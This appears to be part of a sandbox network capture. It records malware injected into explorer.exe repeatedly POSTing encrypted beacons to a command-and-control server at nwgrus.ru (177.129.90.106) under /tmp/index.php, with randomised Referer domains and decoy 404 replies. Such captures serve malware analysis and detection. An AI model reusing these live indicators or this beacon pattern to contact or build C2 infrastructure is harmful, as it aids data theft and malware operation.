Oct 4, 2024 19:17:49.184753895 CEST	115	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 5f 3b ce ec Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu_;]uj.\.8g/
Oct 4, 2024 19:17:50.436805964 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:50.445280075 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bsjhlaqplgxee.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 303 Host: nwgrus.ru
Oct 4, 2024 19:17:50.445280075 CEST	303	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 27 2a e5 9b Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu'rzXGZe&xyY0r$E0KP1!TY~#;/mV?$zn-Z>j'fcKYZ[7gk-Z#j
Oct 4, 2024 19:17:51.851650953 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:51 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:51.860373974 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://msepyhqdoiyw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 239 Host: nwgrus.ru
Oct 4, 2024 19:17:51.860398054 CEST	239	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 60 0d e0 ed Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu`JyN;PG!iy^(_iY;b[-LC@\M&\|~mtK8D&k&/]?vqiHK
Oct 4, 2024 19:17:53.124948025 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:53.134146929 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ubqbmapskssunnlw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 254 Host: nwgrus.ru
Oct 4, 2024 19:17:53.134146929 CEST	254	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 7d 1d b1 82 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu}u4AJD_<xtc@v^w-T^ `,%d36QfzWJj&,'Qv[H.J4Cu%mux)i\r
Oct 4, 2024 19:17:54.706336021 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:54 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:54.716171980 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qfqulohrbnuwl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 318 Host: nwgrus.ru
Oct 4, 2024 19:17:54.716207981 CEST	318	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 73 27 a5 a1 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vus'rqKDkLA_o]2mPKNHLZL<kQPj.DY<.XB IbWk*3at_6e
Oct 4, 2024 19:17:55.980564117 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:55.989092112 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ishmldllgtoat.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 282 Host: nwgrus.ru
Oct 4, 2024 19:17:55.989126921 CEST	282	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 50 59 b8 95 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vuPYGlqbx2Z:*VHR,jhf9Fou/GXU)73gxQPZ_!@w:,,DT52}xC"PgdDiF:[;
Oct 4, 2024 19:17:57.269402981 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:57.277337074 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pgccgnhrnlclx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 294 Host: nwgrus.ru
Oct 4, 2024 19:17:57.277393103 CEST	294	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 43 07 c0 a6 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vuC[Togzwv}"Xa=.!QrL?RL\)cndVk3axq&E%XtLfN"Z-OPiM
Oct 4, 2024 19:17:58.561872959 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:58 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49758	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:58.677289963 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aavvgkbncxkwcma.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 331 Host: nwgrus.ru
Oct 4, 2024 19:17:58.677308083 CEST	331	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 5b 52 c8 b6 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu[RMhRH'+\RsAUXC!iU'<xF/)R/\| mL$t 3lCU,[o{uPU,`hM)BX
Oct 4, 2024 19:17:59.955315113 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:17:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49764	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:17:59.963534117 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ldwiwwwcudjue.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 169 Host: nwgrus.ru
Oct 4, 2024 19:17:59.963534117 CEST	169	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 40 00 aa 87 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu@n.hZ\' Y\h]D>zTLo)3\9EBx@^=`L,
Oct 4, 2024 19:18:01.348764896 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:18:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49771	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:18:01.364276886 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://msydcfqytkyly.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 166 Host: nwgrus.ru
Oct 4, 2024 19:18:01.364296913 CEST	166	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 7d 41 ab 8f Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu}A[4naguPYo~yyj0gD,q:S_\|5(0@a;"&
Oct 4, 2024 19:18:02.656132936 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:18:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49781	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:18:02.664063931 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ynkhngybxmld.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 280 Host: nwgrus.ru
Oct 4, 2024 19:18:02.664100885 CEST	280	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 32 28 a4 a9 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu2(0tRGw LPt3[Xi\dI13[YWzeYh-7WR\|"^P/[d/m[p*lgL;
Oct 4, 2024 19:18:04.039516926 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:18:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49798	177.129.90.106	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:18:05.349643946 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iwomylugxujp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 337 Host: nwgrus.ru
Oct 4, 2024 19:18:05.349643946 CEST	337	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 29 43 cf 93 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA ,[k,vu)C>ib*q3hHl[^TU,G(X-O~x86&N1`.i?v#FT $$15.d`IjawrY\L\|
